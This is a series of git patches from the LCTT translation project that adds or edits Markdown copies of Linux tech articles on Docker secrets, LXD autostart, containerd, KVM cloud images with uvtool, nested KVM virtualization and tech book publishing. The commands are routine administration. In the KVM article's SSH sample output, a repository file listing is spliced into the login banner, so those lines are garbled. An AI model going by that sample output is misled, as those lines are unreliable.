+当授予新创建或运行的服务访问某个secret时,管理器节的其中一个节点(只有管理人员可以访问被存储的所有存储secrets),将已建立的TLS连接发送给正在运行特定服务的节点。这意味着节点自己不能请求secrets,并且只有在管理员提供给他们的secrets时才能访问这些secrets——严格地要求那些需要他们的服务。 + + +如果一个服务被删除了,或者被重新安排在其他地方,管理员能够很快的注意到那些不再需要访问将它从内存中消除的secret 的所有节点,且那节点将不能够访问应用程序的secret。 ``` $ docker service  create --name="redis" --secret="my_secret_data" redis:alpine @@ -53,7 +56,7 @@ $ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret cat: can't open '/run/secrets/my_secret_data': No such file or directory ``` -Check out the [Docker secrets docs][18] for more information and examples on how to create and manage your secrets. And a special shout out to Laurens Van Houtven (https://www.lvh.io/[)][19] in collaboration with the Docker security and core engineering team to help make this feature a reality. +为了获得更多的信息和一些说明如何创建和管理secrets的例子可以看Docker secrets 文档。同时,特别推荐Docker 安全合作团 Laurens Van Houtven (https://www.lvh.io/) 和是这一特性成为现实的团队。 [Get safer apps for dev and ops w/ new #Docker secrets management][5] @@ -64,7 +67,7 @@ Check out the [Docker secrets docs][18] for more information and examples on h ### Safer Apps with Docker -Docker secrets is designed to be easily usable by developers and IT ops teams to build and run safer apps. Docker secrets is a container first architecture designed to keep secrets safe and used only when needed by the exact container that needs that secret to operate. From defining apps and secrets with Docker Compose through an IT admin deploying that Compose file directly in Docker Datacenter, the services, secrets, networks and volumes will travel securely, safely with the application. +Docker secrets 为开发者设计成更易于使用且IT 运维团队用它来构建和运行更加安全的运用程序。Docker secrets 是首个被设计为既能保持secret安全又能仅在当被需要secret操作的确切容器需要的使用的容器结构。从通过直接在Docker 数据中心开发部件文件的IT管理员并使用Docker 组件来定义应用程序和secrets 来看,服务器、secrets、网络和volumes将能够安全可靠地使用应用程序。 Resources to learn more: @@ -83,7 +86,7 @@ Resources to learn more: via: https://blog.docker.com/2017/02/docker-secrets-management/ 作者:[ Ying Li][a] -译者:[译者ID](https://github.com/译者ID) +译者:[HardworkFish](https://github.com/HardworkFish) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 75c0e452dfd33e55e0496dc8328b8c17d2652770 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 08:42:32 +0800 Subject: [PATCH 0641/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20auto?= =?UTF-8?q?=20start=20LXD=20containers=20at=20boot=20time=20in=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...rt LXD containers at boot time in Linux.md | 72 +++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md diff --git a/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md b/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md new file mode 100644 index 0000000000..69b0d9531f --- /dev/null +++ b/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md @@ -0,0 +1,72 @@ +How to auto start LXD containers at boot time in Linux +====== +I am using LXD ("Linux container") based VM. How do I set an LXD container to start on boot in Linux operating system? + +You can always start the container when LXD starts on boot. You need to set boot.autostart to true. You can define the order to start the containers in (starting with highest first) using boot.autostart.priority (default value is 0) option. You can also define the number of seconds to wait after the container started before starting the next one using boot.autostart.delay (default value 0) option. + +### Syntax + +Above discussed keys can be set using the lxc tool with the following syntax: +``` +$ lxc config set {vm-name} {key} {value} +$ lxc config set {vm-name} boot.autostart {true|false} +$ lxc config set {vm-name} boot.autostart.priority integer +$ lxc config set {vm-name} boot.autostart.delay integer +``` + +### How do I set an LXD container to start on boot in Ubuntu Linux 16.10? + +Type the following command: +`$ lxc config set {vm-name} boot.autostart true` +Set an LXD container name 'nginx-vm' to start on boot +`$ lxc config set nginx-vm boot.autostart true` +You can verify setting using the following syntax: +``` +$ lxc config get {vm-name} boot.autostart +$ lxc config get nginx-vm boot.autostart +``` +Sample outputs: +``` +true +``` + +You can the 10 seconds to wait after the container started before starting the next one using the following syntax: +`$ lxc config set nginx-vm boot.autostart.delay 10` +Finally, define the order to start the containers in by setting with highest value. Make sure db_vm container start first and next start nginx_vm +``` +$ lxc config set db_vm boot.autostart.priority 100 +$ lxc config set nginx_vm boot.autostart.priority 99 +``` +Use [the following bash for loop on Linux to view all][1] values: +``` +#!/bin/bash +echo 'The current values of each vm boot parameters:' +for c in db_vm nginx_vm memcache_vm +do + echo "*** VM: $c ***" + for v in boot.autostart boot.autostart.priority boot.autostart.delay + do + echo "Key: $v => $(lxc config get $c $v) " + done + echo "" +done +``` + + +Sample outputs: +![Fig.01: Get autostarting LXD containers values using a bash shell script][2] + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/how-to-auto-start-lxd-containers-at-boot-time-in-linux/ + +作者:[Vivek Gite][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/faq/bash-for-loop/ +[2]:https://www.cyberciti.biz/media/new/faq/2017/02/Autostarting-LXD-containers-values.jpg From d444e3c23dc78f23089a934bac7e4502db8e3b54 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 08:44:46 +0800 Subject: [PATCH 0642/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20A=20tour=20of?= =?UTF-8?q?=20containerd=201.0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../tech/20171211 A tour of containerd 1.0.md | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 sources/tech/20171211 A tour of containerd 1.0.md diff --git a/sources/tech/20171211 A tour of containerd 1.0.md b/sources/tech/20171211 A tour of containerd 1.0.md new file mode 100644 index 0000000000..0c260af9bf --- /dev/null +++ b/sources/tech/20171211 A tour of containerd 1.0.md @@ -0,0 +1,49 @@ +A tour of containerd 1.0 +====== + +![containerd][1] + +We have done a few talks in the past on different features of containerd, how it was designed, and some of the problems that we have fixed along the way. Containerd is used by Docker, Kubernetes CRI, and a few other projects but this is a post for people who may not know what containerd actually does within these platforms. I would like to do more posts on the feature set and design of containerd in the future but for now, we will start with the basics. + +I think the container ecosystem can be confusing at times. Especially with the terminology that we use. Whats this? A runtime. And this? A runtime… containerd (pronounced " _container-dee "_) as the name implies, not contain nerd as some would like to troll me with, is a container daemon. It was originally built as an integration point for OCI runtimes like runc but over the past six months it has added a lot of functionality to bring it up to par with the needs of modern container platforms like Docker and orchestration systems like Kubernetes. + +So what do you actually get using containerd? You get push and pull functionality as well as image management. You get container lifecycle APIs to create, execute, and manage containers and their tasks. An entire API dedicated to snapshot management and an openly governed project to depend on. Basically everything that you need to build a container platform without having to deal with the underlying OS details. I think the most important part of containerd is having a versioned and stable API that will have bug fixes and security patches backported. + +![containerd][2] + +Since there is no such thing as Linux containers in the kernel, containers are various kernel features tied together, when you are building a large platform or distributed system you want an abstraction layer between your management code and the syscalls and duct tape of features to run a container. That is where containerd lives. It provides a client a layer of stable types that platforms can build on top of without ever having to drop down to the kernel level. It's so much nicer to work with Container, Task, and Snapshot types than it is to manage calls to clone() or mount(). Balanced with the flexibility to directly interact with the runtime or host-machine, these objects avoid the sacrifice of capabilities that typically come with higher-level abstractions. The result is that easy tasks are simple to complete and hard tasks are possible. + +![containerd][3]Containerd was designed to be used by Docker and Kubernetes as well as any other container system that wants to abstract away syscalls or OS specific functionality to run containers on Linux, Windows, Solaris, or other Operating Systems. With these users in mind, we wanted to make sure that containerd has only what they need and nothing that they don't. Realistically this is impossible but at least that is what we try for. While networking is out of scope for containerd, what it doesn't do lets higher level systems have full control. The reason for this is, when you are building a distributed system, networking is a very central aspect. With SDN and service discovery today, networking is way more platform specific than abstracting away netlink calls on linux. Most of the new overlay networks are route based and require routing tables to be updated each time a new container is created or deleted. Service discovery, DNS, etc all have to be notified of these changes as well. It would be a large chunk of code to be able to support all the different network interfaces, hooks, and integration points to support this if we added networking to containerd. What we did instead is opted for a robust events system inside containerd so that multiple consumers can subscribe to the events that they care about. We also expose a [Task API ][4]that lets users create a running task, have the ability to add interfaces to the network namespace of the container, and then start the container's process without the need for complex hooks in various points of a container's lifecycle. + +Another area that has been added to containerd over the past few months is a complete storage and distribution system that supports both OCI and Docker image formats. You have a complete content addressed storage system across the containerd API that works not only for images but also metadata, checkpoints, and arbitrary data attached to containers. + +We also took the time to [rethink how "graphdrivers" work][5]. These are the overlay or block level filesystems that allow images to have layers and you to perform efficient builds. Graphdrivers were initially written by Solomon and I when we added support for devicemapper. Docker only supported AUFS at the time so we modeled the graphdrivers after the overlay filesystem. However, making a block level filesystem such as devicemapper/lvm act like an overlay filesystem proved to be much harder to do in the long run. The interfaces had to expand over time to support different features than what we originally thought would be needed. With containerd, we took a different approach, make overlay filesystems act like a snapshotter instead of vice versa. This was much easier to do as overlay filesystems provide much more flexibility than snapshotting filesystems like BTRFS, ZFS, and devicemapper as they don't have a strict parent/child relationship. This helped us build out [a smaller interface for the snapshotters][6] while still fulfilling the requirements needed from things [like a builder][7] as well as reduce the amount of code needed, making it much easier to maintain in the long run. + +![][8] + +You can find more details about the architecture of containerd in [Stephen Day's Dec 7th 2017 KubeCon SIG Node presentation][9]. + +In addition to the technical and design changes in the 1.0 codebase, we also switched the containerd [governance model from the long standing BDFL to a Technical Steering Committee][10] giving the community an independent third party resource to rely on. + + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/12/containerd-ga-features-2/ + +作者:[Michael Crosby][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/michael/ +[1]:https://i0.wp.com/blog.docker.com/wp-content/uploads/950cf948-7c08-4df6-afd9-cc9bc417cabe-6.jpg?resize=400%2C120&ssl=1 +[2]:https://i1.wp.com/blog.docker.com/wp-content/uploads/4a7666e4-ebdb-4a40-b61a-26ac7c3f663e-4.jpg?resize=906%2C470&ssl=1 (containerd) +[3]:https://i1.wp.com/blog.docker.com/wp-content/uploads/2a73a4d8-cd40-4187-851f-6104ae3c12ba-1.jpg?resize=1140%2C680&ssl=1 +[4]:https://github.com/containerd/containerd/blob/master/api/services/tasks/v1/tasks.proto +[5]:https://blog.mobyproject.org/where-are-containerds-graph-drivers-145fc9b7255 +[6]:https://github.com/containerd/containerd/blob/master/api/services/snapshots/v1/snapshots.proto +[7]:https://blog.mobyproject.org/introducing-buildkit-17e056cc5317 +[8]:https://i1.wp.com/blog.docker.com/wp-content/uploads/d0fb5eb9-c561-415d-8d57-e74442a879a2-1.jpg?resize=1140%2C556&ssl=1 +[9]:https://speakerdeck.com/stevvooe/whats-happening-with-containerd-and-the-cri +[10]:https://github.com/containerd/containerd/pull/1748 From 6e2c3ed28b32fca73bbfcdff50fda49974bf5ace Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 09:06:30 +0800 Subject: [PATCH 0643/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20use?= =?UTF-8?q?=20KVM=20cloud=20images=20on=20Ubuntu=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...to use KVM cloud images on Ubuntu Linux.md | 233 ++++++++++++++++++ 1 file changed, 233 insertions(+) create mode 100644 sources/tech/20171207 How to use KVM cloud images on Ubuntu Linux.md diff --git a/sources/tech/20171207 How to use KVM cloud images on Ubuntu Linux.md b/sources/tech/20171207 How to use KVM cloud images on Ubuntu Linux.md new file mode 100644 index 0000000000..4420807de7 --- /dev/null +++ b/sources/tech/20171207 How to use KVM cloud images on Ubuntu Linux.md @@ -0,0 +1,233 @@ +How to use KVM cloud images on Ubuntu Linux +====== + +Kernel-based Virtual Machine (KVM) is a virtualization module for the Linux kernel that turns it into a hypervisor. You can create an Ubuntu cloud image with KVM from the command line using Ubuntu virtualisation front-end for libvirt and KVM. + +How do I download and use a cloud image with kvm running on an Ubuntu Linux server? How do I create create a virtual machine without the need of a complete installation on an Ubuntu Linux 16.04 LTS server?Kernel-based Virtual Machine (KVM) is a virtualization module for the Linux kernel that turns it into a hypervisor. You can create an Ubuntu cloud image with KVM from the command line using Ubuntu virtualisation front-end for libvirt and KVM. + +This quick tutorial shows to install and use uvtool that provides a unified and integrated VM front-end to Ubuntu cloud image downloads, libvirt, and cloud-init. + +### Step 1 - Install KVM + +You must have kvm installed and configured. Use the [apt command][1]/[apt-get command][2] as follows: +``` +$ sudo apt install qemu-kvm libvirt-bin virtinst bridge-utils cpu-checker +$ kvm-ok +## [configure bridged networking as described here][3] +$ sudo vi /etc/network/interfaces +$ sudo systemctl restart networking +$ sudo brctl show +``` +See "[How to install KVM on Ubuntu 16.04 LTS Headless Server][4]" for more info. + +### Step 2 - Install uvtool + +Type the following [apt command][1]/[apt-get command][2]: +``` +$ sudo apt install uvtool +``` +Sample outputs: +``` +[sudo] password for vivek: +Reading package lists... Done +Building dependency tree +Reading state information... Done +The following packages were automatically installed and are no longer required: + gksu libgksu2-0 libqt5designer5 libqt5help5 libqt5printsupport5 libqt5sql5 libqt5sql5-sqlite libqt5xml5 python3-dbus.mainloop.pyqt5 python3-notify2 python3-pyqt5 python3-sip +Use 'sudo apt autoremove' to remove them. +The following additional packages will be installed: + cloud-image-utils distro-info python-boto python-pyinotify python-simplestreams socat ubuntu-cloudimage-keyring uvtool-libvirt +Suggested packages: + cloud-utils-euca shunit2 python-pyinotify-doc +The following NEW packages will be installed: + cloud-image-utils distro-info python-boto python-pyinotify python-simplestreams socat ubuntu-cloudimage-keyring uvtool uvtool-libvirt +0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded. +Need to get 1,211 kB of archives. +After this operation, 6,876 kB of additional disk space will be used. +Get:1 http://in.archive.ubuntu.com/ubuntu artful/main amd64 distro-info amd64 0.17 [20.3 kB] +Get:2 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 python-boto all 2.44.0-1ubuntu2 [740 kB] +Get:3 http://in.archive.ubuntu.com/ubuntu artful/main amd64 python-pyinotify all 0.9.6-1 [24.6 kB] +Get:4 http://in.archive.ubuntu.com/ubuntu artful/main amd64 ubuntu-cloudimage-keyring all 2013.11.11 [4,504 B] +Get:5 http://in.archive.ubuntu.com/ubuntu artful/main amd64 cloud-image-utils all 0.30-0ubuntu2 [17.2 kB] +Get:6 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 python-simplestreams all 0.1.0~bzr450-0ubuntu1 [29.7 kB] +Get:7 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 socat amd64 1.7.3.2-1 [342 kB] +Get:8 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 uvtool all 0~git122-0ubuntu1 [6,498 B] +Get:9 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 uvtool-libvirt all 0~git122-0ubuntu1 [26.9 kB] +Fetched 1,211 kB in 3s (393 kB/s) +Selecting previously unselected package distro-info. +(Reading database ... 199933 files and directories currently installed.) +Preparing to unpack .../0-distro-info_0.17_amd64.deb ... +Unpacking distro-info (0.17) ... +Selecting previously unselected package python-boto. +Preparing to unpack .../1-python-boto_2.44.0-1ubuntu2_all.deb ... +Unpacking python-boto (2.44.0-1ubuntu2) ... +Selecting previously unselected package python-pyinotify. +Preparing to unpack .../2-python-pyinotify_0.9.6-1_all.deb ... +Unpacking python-pyinotify (0.9.6-1) ... +Selecting previously unselected package ubuntu-cloudimage-keyring. +Preparing to unpack .../3-ubuntu-cloudimage-keyring_2013.11.11_all.deb ... +Unpacking ubuntu-cloudimage-keyring (2013.11.11) ... +Selecting previously unselected package cloud-image-utils. +Preparing to unpack .../4-cloud-image-utils_0.30-0ubuntu2_all.deb ... +Unpacking cloud-image-utils (0.30-0ubuntu2) ... +Selecting previously unselected package python-simplestreams. +Preparing to unpack .../5-python-simplestreams_0.1.0~bzr450-0ubuntu1_all.deb ... +Unpacking python-simplestreams (0.1.0~bzr450-0ubuntu1) ... +Selecting previously unselected package socat. +Preparing to unpack .../6-socat_1.7.3.2-1_amd64.deb ... +Unpacking socat (1.7.3.2-1) ... +Selecting previously unselected package uvtool. +Preparing to unpack .../7-uvtool_0~git122-0ubuntu1_all.deb ... +Unpacking uvtool (0~git122-0ubuntu1) ... +Selecting previously unselected package uvtool-libvirt. +Preparing to unpack .../8-uvtool-libvirt_0~git122-0ubuntu1_all.deb ... +Unpacking uvtool-libvirt (0~git122-0ubuntu1) ... +Setting up distro-info (0.17) ... +Setting up ubuntu-cloudimage-keyring (2013.11.11) ... +Setting up cloud-image-utils (0.30-0ubuntu2) ... +Setting up socat (1.7.3.2-1) ... +Setting up python-pyinotify (0.9.6-1) ... +Setting up python-boto (2.44.0-1ubuntu2) ... +Setting up python-simplestreams (0.1.0~bzr450-0ubuntu1) ... +Processing triggers for doc-base (0.10.7) ... +Processing 1 added doc-base file... +Setting up uvtool (0~git122-0ubuntu1) ... +Processing triggers for man-db (2.7.6.1-2) ... +Setting up uvtool-libvirt (0~git122-0ubuntu1) ... +``` + + +### Step 3 - Download the Ubuntu Cloud image + +You need to use the uvt-simplestreams-libvirt command. It maintains a libvirt volume storage pool as a local mirror of a subset of images available from a simplestreams source, such as Ubuntu cloud images. To update uvtool's libvirt volume storage pool with all current amd64 images, run: +`$ uvt-simplestreams-libvirt sync arch=amd64` +To just update/grab Ubuntu 16.04 LTS (xenial/amd64) image run: +`$ uvt-simplestreams-libvirt --verbose sync release=xenial arch=amd64` +Sample outputs: +``` +Adding: com.ubuntu.cloud:server:16.04:amd64 20171121.1 +``` + +Pass the query option to queries the local mirror: +`$ uvt-simplestreams-libvirt query` +Sample outputs: +``` +release=xenial arch=amd64 label=release (20171121.1) +``` + +Now, I have an image for Ubuntu xenial and I create the VM. + +### Step 4 - Create the SSH keys + +You need ssh keys for login into KVM VMs. Use the ssh-keygen command to create a new one if you do not have any keys at all. +`$ ssh-keygen` +See "[How To Setup SSH Keys on a Linux / Unix System][5]" and "[Linux / UNIX: Generate SSH Keys][6]" for more info. + +### Step 5 - Create the VM + +It is time to create the VM named vm1 i.e. create an Ubuntu Linux 16.04 LTS VM: +`$ uvt-kvm create vm1` +By default vm1 created using the following characteristics: + + 1. RAM/memory : 512M + 2. Disk size: 8GiB + 3. CPU: 1 vCPU core + + + +To control ram, disk, cpu, and other characteristics use the following syntax: +`$ uvt-kvm create vm1 \ +--memory MEMORY \ +--cpu CPU \ +--disk DISK \ +--bridge BRIDGE \ +--ssh-public-key-file /path/to/your/SSH_PUBLIC_KEY_FILE \ +--packages PACKAGES1, PACKAGES2, .. \ +--run-script-once RUN_SCRIPT_ONCE \ +--password PASSWORD +` +Where, + + 1. **\--password PASSWORD** : Set the password for the ubuntu user and allow login using the ubuntu user (not recommended use ssh keys). + 2. **\--run-script-once RUN_SCRIPT_ONCE** : Run RUN_SCRIPT_ONCE script as root on the VM the first time it is booted, but never again. Give full path here. This is useful to run custom task on VM such as setting up security or other stuff. + 3. **\--packages PACKAGES1, PACKAGES2, ..** : Install the comma-separated packages on first boot. + + + +To get help, run: +``` +$ uvt-kvm -h +$ uvt-kvm create -h +``` + +#### How do I delete my VM? + +To destroy/delete your VM named vm1, run (please use the following command with care as there would be no confirmation box): +`$ uvt-kvm destroy vm1` + +#### To find out the IP address of the vm1, run: + +`$ uvt-kvm ip vm1` +192.168.122.52 + +#### To list all VMs run + +`$ uvt-kvm list` +Sample outputs: +``` +vm1 +freebsd11.1 + +``` + +### Step 6 - How to login to the vm named vm1 + +The syntax is: +`$ uvt-kvm ssh vm1` +Sample outputs: +``` +Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64) + + comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md Documentation: https://help.ubuntu.com + comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md Management: https://landscape.canonical.com + comic core.md Dict.md lctt2014.md lctt2016.md LCTT翻译规范.md LICENSE Makefile published README.md sign.md sources translated 选题模板.txt 中文排版指北.md Support: https://ubuntu.com/advantage + + Get cloud support with Ubuntu Advantage Cloud Guest: + http://www.ubuntu.com/business/services/cloud + +0 packages can be updated. +0 updates are security updates. + + +Last login: Thu Dec 7 09:55:06 2017 from 192.168.122.1 + +``` + +Another option is to use the regular ssh command from macOS/Linux/Unix/Windows client: +`$ ssh [[email protected]][7] +$ ssh -i ~/.ssh/id_rsa [[email protected]][7]` +Sample outputs: +[![Connect to the running VM using ssh][8]][8] +Once vim created you can use the virsh command as usual: +`$ virsh list` + + +-------------------------------------------------------------------------------- + +via: https://www.cyberciti.biz/faq/how-to-use-kvm-cloud-images-on-ubuntu-linux/ + +作者:[Vivek Gite][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.cyberciti.biz +[1]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info) +[2]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info) +[3]:https://www.cyberciti.biz/faq/how-to-create-bridge-interface-ubuntu-linux/ +[4]:https://www.cyberciti.biz/faq/installing-kvm-on-ubuntu-16-04-lts-server/ +[5]:https://www.cyberciti.biz/faq/how-to-set-up-ssh-keys-on-linux-unix/ +[6]:https://www.cyberciti.biz/faq/linux-unix-generating-ssh-keys/ +[7]:https://www.cyberciti.biz/cdn-cgi/l/email-protection +[8]:https://www.cyberciti.biz/media/new/faq/2017/12/connect-to-the-running-VM-using-ssh.jpg From d95fed9959bed0fabdd3d2bf931d9c638df8213a Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 17 Dec 2017 09:08:41 +0800 Subject: [PATCH 0644/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20enab?= =?UTF-8?q?le=20Nested=20Virtualization=20in=20KVM=20on=20CentOS=207=20/?= =?UTF-8?q?=20RHEL=207?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...tualization in KVM on CentOS 7 - RHEL 7.md | 116 ++++++++++++++++++ 1 file changed, 116 insertions(+) create mode 100644 sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md diff --git a/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md b/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md new file mode 100644 index 0000000000..c6dd0cde73 --- /dev/null +++ b/sources/tech/20171212 How to enable Nested Virtualization in KVM on CentOS 7 - RHEL 7.md @@ -0,0 +1,116 @@ +How to enable Nested Virtualization in KVM on CentOS 7 / RHEL 7 +====== +**Nested virtualization** means to configure virtualization environment inside a virtual machine. In other words we can say nested virtualization is a feature in the hypervisor which allows us to install & run a virtual machine inside a virtual server via hardware acceleration from the **hypervisor** (host). + +In this article, we will discuss how to enable nested virtualization in KVM on CentOS 7 / RHEL 7. I am assuming you have already configured KVM hypervisor. In case you have not familiar on how to install and configure **KVM hypervisor** , then refer the following article + +Let's jump into the hypervisor and verify whether nested virtualization is enabled or not on your KVM host + +For Intel based Processors run the command, +``` +[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested +N +[root@kvm-hypervisor ~]# +``` + +For AMD based Processors run the command, +``` +[root@kvm-hypervisor ~]# cat /sys/module/kvm_amd/parameters/nested +N +[root@kvm-hypervisor ~]# +``` + +In the above command output 'N' indicates that Nested virtualization is disabled. If we get the output as 'Y' then it indicates that nested virtualization is enabled on your host. + +Now to enable nested virtualization, create a file with the name " **/etc/modprobe.d/kvm-nested.conf** " with the following content. +``` +[root@kvm-hypervisor ~]# vi /etc/modprobe.d/kvm-nested.conf +options kvm-intel nested=1 +options kvm-intel enable_shadow_vmcs=1 +options kvm-intel enable_apicv=1 +options kvm-intel ept=1 +``` + +Save & exit the file + +Now remove ' **kvm_intel** ' module and then add the same module with modprobe command. Before removing the module, make sure VMs are shutdown otherwise we will get error message like " **modprobe: FATAL: Module kvm_intel is in use** " +``` +[root@kvm-hypervisor ~]# modprobe -r kvm_intel +[root@kvm-hypervisor ~]# modprobe -a kvm_intel +[root@kvm-hypervisor ~]# +``` + +Now verify whether nested virtualization feature enabled or not. +``` +[root@kvm-hypervisor ~]# cat /sys/module/kvm_intel/parameters/nested +Y +[root@kvm-hypervisor ~]# +``` + +#### + +Test Nested Virtualization + +Let's suppose we have a VM with name "director" on KVM hypervisor on which I have enabled nested virtualization. Before testing, make sure CPU mode for the VM is either as " **host-model** " or " **host-passthrough** " , to check cpu mode of a virtual machine use either Virt-Manager GUI or virsh edit command + +![cpu_mode_vm_kvm][1] + +![cpu_mode_vm_kvm][2] + +Now login to the director VM and run lscpu and lsmod command +``` +[root@kvm-hypervisor ~]# ssh 192.168.126.1 -l root +root@192.168.126.1's password: +Last login: Sun Dec 10 07:05:59 2017 from 192.168.126.254 +[root@director ~]# lsmod | grep kvm +kvm_intel             170200  0 +kvm                   566604  1 kvm_intel +irqbypass              13503  1 kvm +[root@director ~]# +[root@director ~]# lscpu +``` + +![lscpu_command_rhel7_centos7][1] + +![lscpu_command_rhel7_centos7][3] + +Let's try creating a virtual machine either from virtual manager GUI or virt-install inside the director vm, in my case i am using virt-install command +``` +[root@director ~]# virt-install  -n Nested-VM  --description "Test Nested VM"  --os-type=Linux  --os-variant=rhel7  --ram=2048  --vcpus=2  --disk path=/var/lib/libvirt/images/nestedvm.img,bus=virtio,size=10  --graphics none  --location /var/lib/libvirt/images/CentOS-7-x86_64-DVD-1511.iso --extra-args console=ttyS0 +Starting install... +Retrieving file .treeinfo...                                                   | 1.1 kB  00:00:00 +Retrieving file vmlinuz...                                                     | 4.9 MB  00:00:00 +Retrieving file initrd.img...                                                  |  37 MB  00:00:00 +Allocating 'nestedvm.img'                                                      |  10 GB  00:00:00 +Connected to domain Nested-VM +Escape character is ^] +[    0.000000] Initializing cgroup subsys cpuset +[    0.000000] Initializing cgroup subsys cpu +[    0.000000] Initializing cgroup subsys cpuacct +[    0.000000] Linux version 3.10.0-327.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Thu Nov 19 22:10:57 UTC 2015 +……………………………………………… +``` + +![cli-installer-virt-install-command-kvm][1] + +![cli-installer-virt-install-command-kvm][4] + +This confirms that nested virtualization has been enabled successfully as we are able to create virtual machine inside a virtual machine. + +This Concludes the article, please do share your feedback and comments. + +-------------------------------------------------------------------------------- + +via: https://www.linuxtechi.com/enable-nested-virtualization-kvm-centos-7-rhel-7/ + +作者:[Pradeep Kumar][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxtechi.com +[1]:https://www.linuxtechi.com/wp-content/plugins/lazy-load/images/1x1.trans.gif +[2]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cpu_mode_vm_kvm.jpg +[3]:https://www.linuxtechi.com/wp-content/uploads/2017/12/lscpu_command_rhel7_centos7-1024x408.jpg +[4]:https://www.linuxtechi.com/wp-content/uploads/2017/12/cli-installer-virt-install-command-kvm.jpg From bb7f4ccc625a55a309550045eaa57b78ca997eda Mon Sep 17 00:00:00 2001 From: FelixYFZ <33593534+FelixYFZ@users.noreply.github.com> Date: Sun, 17 Dec 2017 09:29:18 +0800 Subject: [PATCH 0645/1627] Update 20171201 How to find a publisher for your tech book.md --- ... to find a publisher for your tech book.md | 46 ++----------------- 1 file changed, 4 insertions(+), 42 deletions(-) diff --git a/translated/tech/20171201 How to find a publisher for your tech book.md b/translated/tech/20171201 How to find a publisher for your tech book.md index 8ac4cf4001..755e6a1d5c 100644 --- a/translated/tech/20171201 How to find a publisher for your tech book.md +++ b/translated/tech/20171201 How to find a publisher for your tech book.md @@ -8,54 +8,16 @@ Translated by FelixYFZ ![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") Image by : opensource.com -你已经有了一个写一本科技书籍的想法,祝贺你!就像徒步旅行一样,或者是去学做一种甜点心,写一本书就像人们讨论的那些事情中一种, -但是却都只停留在思考的初级阶段。 那是可以理解的,因为失败的几率是很高的。要想实现它你需要在把你的想法阐述给出版商,去探讨是否已经准备充分去写成一本书。要去实现这一步是相当困难的,但最困难的是你将缺少足够的资源信息来完成它。如果你想和一个传统的出版商合作,你需要在他们面前推销你的书籍以期望能够得到出版的机会。我是Pragmatci Bookshelf的编辑主管,所以我经常看到很多的提案,也去帮助作者提议更好的主意。 有些是好的,有些则不然,但我经常会看到许多不符合我们出版社风格的文稿。我会帮助你去选择最适合的出版商,来让你的想法得到认可。 